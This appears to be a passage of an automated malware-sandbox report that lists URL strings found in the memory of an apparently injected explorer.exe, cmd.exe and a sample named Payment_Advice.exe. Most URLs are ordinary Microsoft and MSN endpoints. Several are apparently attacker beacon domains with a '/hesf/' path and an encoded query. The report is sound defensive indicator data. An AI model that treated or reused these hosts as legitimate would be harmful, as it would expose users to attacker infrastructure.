          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.svgco.life
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.svgco.life/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.svgco.life/hesf/www.pancakesandwaflesbeverages.net
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.svgco.lifeReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tygyro.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tygyro.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tygyro.com/hesf/www.87b52.club
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tygyro.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.usbulletinnow.com
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.usbulletinnow.com/hesf/
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.usbulletinnow.com/hesf/www.im-newbie-journal.online
          Source: explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.usbulletinnow.comReferer:
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSd
          Source: explorer.exe, 0000000F.00000002.3851844225.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076911253.000000000703F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077182219.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.000000000702D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F09000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000F.00000003.2284163967.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.00000000091FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comer
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 0000000F.00000000.1596839591.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com48
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000789D000.00000004.00000020.00020000.00000000.sdmp, ewdbwwfpdh.bmp.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
          Source: explorer.exe, 0000000F.00000002.3891932584.000000001279F000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000010.00000002.3848016870.000000000418F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.im-newbie-journal.online/hesf/?jBZ=bZ0cL2W3356ZdQMSZx0hbFAlBxxbFCW9aXPVjCHIIl88pIGO5acXF
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
